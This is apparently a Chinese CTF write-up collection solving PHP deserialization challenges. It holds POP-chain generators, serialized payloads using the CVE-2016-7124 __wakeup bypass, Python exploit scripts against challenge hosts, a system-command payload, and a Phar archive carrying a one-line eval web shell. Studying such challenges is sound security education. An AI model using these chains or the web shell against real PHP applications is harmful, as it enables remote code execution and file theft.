Web入门-PHP反序列化漏洞

[SWPUCTF 2021 新生赛]no_wakeup

反序列化时触发__wakeup函数,考虑绕开。

// Build the two-property object the challenge's unserialize() expects and
// print its serialized form. The "2" before the brace is the declared
// property count; the CVE-2016-7124 bypass described next works by
// declaring more properties than the object actually carries.
$target = new HaHaHa();
$target->admin = 'admin';
$target->passwd = 'wllm';
$serialized = serialize($target);
print_r($serialized); // expected: O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

CVE-2016-7124:当序列化字符串中声明的属性个数大于对象实际属性个数时,__wakeup() 不会被调用(仅影响未修复该漏洞的旧版本 PHP),据此构造:

O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

payload:

import requests

# Same request as before, just split into its parts: class.php reads the
# serialized string from ?p=. The declared property count (3) exceeds the
# real one (2), which is what skips __wakeup() on unpatched PHP.
BASE_URL = 'http://node4.anna.nssctf.cn:28398/class.php'
SERIALIZED = 'O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}'
response = requests.get(BASE_URL + '?p=' + SERIALIZED)
# Only the tail of the body is printed -- presumably where the challenge echoes its result.
print(response.text[-44:])

[SWPUCTF 2021 新生赛]pop

找链子打。

<?php
/**
 * Innermost node of the chain. Its private/protected properties are why the
 * output must be URL-encoded: serialize() prefixes such property names with
 * NUL bytes ("\0w44m\0admin", "\0*\0passwd") that cannot travel in a query
 * string unencoded.
 */
class w44m
{
    private $admin = 'w44m';
    protected $passwd = '08067';
}

/** Outer node; its single property carries the w33m object. */
class w22m
{
    public $w00m;
}

/** Middle node: w00m points at the w44m object, w22m holds the marker string. */
class w33m
{
    public $w00m;
    public $w22m;
}

// Assemble w22m -> w33m -> w44m (innermost first) and emit the URL-safe form.
// Property order in the output follows the class declarations, not assignment order.
$inner = new w44m();
$middle = new w33m();
$middle->w00m = $inner;
$middle->w22m = 'Getflag';
$outer = new w22m();
$outer->w00m = $middle;
echo urlencode(serialize($outer));
?>

exp:

import requests

# index.php takes the chain from ?w00m=. The value is the urlencode()d output
# of the PHP generator above; the %00 bytes are the NUL prefixes serialize()
# puts on private/protected property names.
BASE_URL = 'http://node5.anna.nssctf.cn:28507/index.php'
ENCODED_CHAIN = (
    'O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7B'
    's%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22'
    '%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7D'
    's%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D'
)
response1 = requests.get(BASE_URL + '?w00m=' + ENCODED_CHAIN)
# Only the tail of the body is printed -- presumably where the challenge echoes its result.
print(response1.text[-44:])

[HUBUCTF 2022 新生赛]checkin

弱比较(==)下,true 与任意非空、非零的值比较都相等,所以用户名和密码都传布尔 true 即可。

<?php
// Both fields are boolean true: under loose comparison (==) true equals any
// truthy value, which is the weakness this check-in relies on. The fix on the
// server side is a strict (===) comparison against typed values.
$credentials = ['username' => true, 'password' => true];
$encoded = serialize($credentials);
echo $encoded;
?>

payload:

http://node5.anna.nssctf.cn:28305/?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

[NISACTF 2022]babyserialize

PHP魔术方法:

__wakeup():unserialize() 被调用时触发。

__call():调用不可访问或不存在的方法。

__toString():对象被当作字符串使用时。

__invoke():以函数方式调用对象。

__set():给不可访问或不存在属性赋值。

有俩坑:$fun必须改为别的,要不总是进入hint();命令执行有WAF,可大小写绕过。

// Chain: TianXiWei -> Ilovetxw -> four -> Ilovetxw -> NISA, built innermost
// first. `fun` is given a non-default value (the note above: the default path
// always ends in hint()); `txw4ever` carries the string the sink executes.
$sink = new NISA();
$sink->fun = 'asdf';
$sink->txw4ever = 'System("cat /fllllllaaag");';

$bridge = new Ilovetxw();
$bridge->su = $sink;

$hop = new four();
$hop->a = $bridge;

$link = new Ilovetxw();
$link->huang = $hop;

$chain = new TianXiWei();
$chain->ext = $link;
echo urlencode(serialize($chain));

[NISACTF 2022]bingdundun~

构造 Phar:打包后的 .phar 文件其实就是一个类似 .jar 的归档文件,里面放一个 67.php,内容为 payload:

<?php
// Contents of 67.php inside the archive: a one-line PHP web shell that
// evaluates whatever arrives in POST "cmd". This is what the server runs once
// the uploaded archive is included through phar://. Defensively, the lesson
// is that uploaded files must never reach include()/stream wrappers under
// attacker-influenced paths, regardless of extension.
$payload='<?php @eval($_POST["cmd"]);?>';
// Writing a Phar needs the phar extension with phar.readonly=0 (the default
// is 1, so this is typically run as `php -d phar.readonly=0 ...`).
$phar=new Phar("/home/monoceros406/Desktop/CTF-Workbench/example.phar");
// Buffer all changes so stub and contents are flushed in one write at stopBuffering().
$phar->startBuffering();
// phar:// identifies an archive by the __HALT_COMPILER() marker in its stub,
// not by the file extension -- which is why the file can later be renamed .zip.
$phar->setStub("<?php __HALT_COMPILER();?>");
$phar->addFromString("67.php","$payload");
$phar->stopBuffering();
?>

phar:// 伪协议不依赖文件后缀,可改成 .zip 后缀上传;它通过 setStub 写入的 stub 内容(__HALT_COMPILER 标记)来识别 Phar 文件。

上传后访问:

http://node5.anna.nssctf.cn:28678/?bingdundun=phar://0f2c819eaf2a6ec7a8b16be40c7413e5.zip/67.php

Antsword连即可。

[SWPUCTF 2022 新生赛]1z_unserialize

nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

[SWPUCTF 2022 新生赛]ez_ez_unserialize

反序列化时通过修改序列化字符串中的长度字段绕过__wakeup,exp:

<?php
/**
 * Challenge class. The intended guard lives in __wakeup(): any $x other than
 * this file's own path is reset before __destruct() can highlight_file() it.
 * That guard is only effective if __wakeup() actually runs, which is exactly
 * what the write-up avoids with a malformed serialized string. The durable
 * fix is not inside this class: do not hand attacker-controlled input to
 * unserialize() at all (use json_decode for data exchange).
 */
class X{
// Path that __destruct() will highlight. Defaults to this file.
public $x = __FILE__;
function __construct($x){
$this->x = $x;
}
// Runs on unserialize(); forces $x back to __FILE__ so only this file can be shown.
function __wakeup(){
if ($this->x !== __FILE__) {
$this->x = __FILE__;
}
}
// Runs when the object is freed: the sink of the chain.
function __destruct(){
highlight_file($this->x);
}
}
// Serialize an X whose $x points at the flag file. On the target __wakeup()
// would reset it, so the emitted string is edited by hand afterwards (see the
// note below). Locally, the destructor runs highlight_file() on that path when
// the script ends.
$probe = new X("fllllllag.php");
echo urlencode(serialize($probe));
?>

将类名“X”的长度字段改大,而不是更改属性个数(即大括号前的数字)。

[NISACTF 2022]popchains

protected 属性不能从类外赋值,直接在类定义里写默认值即可。

<?php
/**
 * Entry class of the chain. __toString() is the pivot: it dereferences
 * $this->string->page, so if $string holds an object without a `page`
 * property, that object's __get() fires.
 */
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
// Triggered when the object is used as a string (e.g. passed to preg_match below).
public function __toString(){
return $this->string->page;
}
// Deny-list on $page. preg_match() stringifies $page, so a nested
// Road_is_Long stored there reaches __toString() from inside the "filter".
// A regex deny-list is no substitute for refusing unserialize() on user input.
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
/**
 * Sink class. __invoke() makes the object callable; calling it include()s the
 * protected $var -- a file-inclusion primitive whose path comes from the
 * serialized data. $var is protected, so the chain relies on the in-class
 * default "/flag" rather than assigning it from outside.
 */
class Try_Work_Hard{
protected $var="/flag";
// include() of a value taken from serialized state: file inclusion sink.
public function append($value){
include($value);
}
// Runs when the object is called as a function (from Make_a_Change::__get).
public function __invoke(){
$this->append($this->var);
}
}
/**
 * Pivot from a property read to a function call: __get() runs for any
 * inaccessible or undefined property and calls whatever $effort holds, so an
 * object with __invoke() stored there gets executed.
 */
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
// Reading a missing property (Road_is_Long::__toString reads ->page) lands here.
public function __get($key){
$function = $this->effort;
return $function();
}
}
// Chain, built innermost first:
//   Road_is_Long(outer) --__wakeup: preg_match($page)--> Road_is_Long(inner)::__toString
//   --> Make_a_Change::__get --> Try_Work_Hard::__invoke --> include("/flag")
// The inner Road_is_Long keeps its constructor default page 'index.php'.
$sink = new Try_Work_Hard();
$pivot = new Make_a_Change();
$pivot->effort = $sink;
$inner = new Road_is_Long();
$inner->string = $pivot;
$outer = new Road_is_Long();
$outer->page = $inner;
echo urlencode(serialize($outer));
?>

[第五空间 2021]pklovecloud

<?php
include 'flag.php';
// Decoy: the echo_name() the challenge would normally reach; returns a fixed string.
class pkshow{
function echo_name(){
return "Pk very safe^.^";
}
}
/**
 * Entry class. __toString() delegates to $cinder->echo_name(); the constructor
 * wires $cinder to an `ace` (not a `pkshow`), so stringifying an acp reaches
 * ace::echo_name(). $cinder is protected, which is why the payload is built
 * with `new acp()` and urlencode()d (NUL-prefixed property name).
 * Note: when $cinder is unset __toString() returns nothing; on PHP 8 a
 * non-string return from __toString() is an Error rather than a silent null.
 */
class acp{
protected $cinder;
public $neutron;
public $nova;
function __construct(){
$this->cinder=new ace;
}
function __toString(){
if(isset($this->cinder))
return $this->cinder->echo_name();
}
}
/**
 * Sink class. echo_name() unserialize()s $docker -- a second unserialize on
 * data reachable from the outer serialized string -- then returns the
 * contents of "./{$filename}" when neutron === nova.
 * $heat is never defined in this class, so neutron is set to null (with an
 * undefined-variable notice); with $nova also unset the strict comparison
 * holds and the file is read. $filename is public with a path-traversal
 * default, so the serialized object alone decides which file is returned:
 * file paths must never come from unserialized input.
 */
class ace{
public $filename="../nssctfasdasdflag";
public $openstack;
public $docker=NULL;
function echo_name(){
// Nested unserialize of attacker-supplied data; with $docker NULL this yields false.
$this->openstack=unserialize($this->docker);
// $heat is undefined here -> null. Writing a property onto the `false` above
// autovivifies a stdClass on older PHP (deprecated as of 8.1) -- verify on the target version.
$this->openstack->neutron=$heat;
// null === null when $nova was never set, so the read below is reached.
if($this->openstack->neutron===$this->openstack->nova){
$file="./{$this->filename}";
// Read twice; a missing/unreadable file makes file_get_contents() return false
// (with a warning), which selects the "keystone lost~" branch.
if(file_get_contents($file)){
return file_get_contents($file);
}
else{
return "keystone lost~";
}
}
}
}
// acp's constructor already wires $cinder to an ace whose defaults
// (filename "../nssctfasdasdflag", docker NULL) satisfy the echo_name() path,
// so no property needs to be set. The protected $cinder is NUL-prefixed in
// the serialized form, hence urlencode().
$chain = new acp();
echo urlencode(serialize($chain));
?>